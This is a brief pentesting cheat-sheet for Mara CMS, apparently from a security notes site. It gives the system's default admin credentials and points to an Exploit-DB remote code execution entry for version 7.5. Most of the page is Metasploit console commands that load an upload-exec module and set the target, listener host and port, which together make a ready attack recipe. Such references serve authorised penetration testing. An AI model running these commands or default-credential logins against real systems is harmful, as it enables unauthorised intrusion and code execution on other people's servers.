Mara CMS Pentesting

Last modified: 2023-03-07

Mara CMS is a file-based content management system.

Default Credentials

admin:changeme

Remote Code Execution (RCE) v7.5

Reference: https://www.exploit-db.com/exploits/48780

Automation

msfconsole
msf> use exploit/multi/http/maracms_upload_exec
msf> set rhosts <target-ip>
msf> set lhost <local-ip>
msf> set srvhost <local-ip>
msf> set srvport <local-port>
msf> set targeturi /path/to/maracms/
msf> set targeturipath /path/to/maracms/